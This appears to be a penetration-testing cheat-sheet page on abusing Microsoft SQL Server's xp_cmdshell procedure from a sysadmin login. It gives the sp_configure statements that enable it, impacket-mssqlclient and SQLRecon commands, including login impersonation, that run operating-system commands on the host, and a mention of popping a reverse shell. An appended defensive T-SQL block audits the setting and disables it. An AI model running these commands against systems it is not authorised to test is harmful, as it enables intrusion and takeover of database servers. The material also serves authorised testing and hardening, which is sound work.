Leverage xp_cmdshell Procedure

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit

Vulnerability

If you are authenticated with sysadmin rights on the instance, you can use the xp_cmdshell extended stored procedure to execute operating-system commands on the database host.

Prerequisites

  • Having sysadmin privileges on the Microsoft SQL instance.

Exploit

To do it manually, run the following SQL statements.

-- This turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE

-- This enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

If you are connected with impacket-mssqlclient, you can use the built-in commands the tool provides.

# This enables xp_cmdshell; RECONFIGURE then applies the change.
enable_xp_cmdshell
RECONFIGURE

# xp_cmdshell can now be used to enumerate the host or pop a reverse shell.
xp_cmdshell $command

Using [SQLRecon], you can run the following commands.

# Add `/i:$domain\$username` to impersonate another login and perform this operation as that user.
./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:ienablexp
./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:ixpcmd /c:$command
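As an added example (not part of the original note), the defender's counterpart to the sp_configure change shown above: T-SQL that reports whether xp_cmdshell is currently enabled, lists the logins that satisfy the sysadmin prerequisite, and returns the feature to its disabled state. It assumes only the standard sys.configurations / sp_configure interface and a connection with rights to run sp_configure.

```sql
-- Added example: audit and harden the xp_cmdshell setting the note above enables.
-- Assumes a connection that can read sys.configurations and run sp_configure.

-- 1. Report the current state of the two options the procedure flips.
--    value is the configured (possibly pending) value; value_in_use is the running value.
SELECT name,
       CAST(value AS INT)        AS configured_value,
       CAST(value_in_use AS INT) AS running_value,
       CASE WHEN CAST(value_in_use AS INT) = 1 THEN 'ENABLED' ELSE 'disabled' END AS state
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. List logins that meet the sysadmin prerequisite (each one can enable xp_cmdshell).
--    Types S, U and G are SQL logins, Windows logins and Windows groups.
SELECT name, type_desc, is_disabled
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G')
  AND IS_SRVROLEMEMBER('sysadmin', name) = 1
ORDER BY name;

-- 3. Disable xp_cmdshell and hide advanced options again; RECONFIGURE applies each change.
--    Guarded so it only acts when step 1 would have reported ENABLED.
IF EXISTS (SELECT 1 FROM sys.configurations
           WHERE name = 'xp_cmdshell' AND CAST(value_in_use AS INT) = 1)
BEGIN
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
    EXEC sp_configure 'show advanced options', 0;
    RECONFIGURE;
END;
```

Re-run step 1 after the hardening block; both options should report running_value 0. Any sanctioned job that relies on xp_cmdshell will break, so confirm with the owners of the logins from step 2 before running step 3.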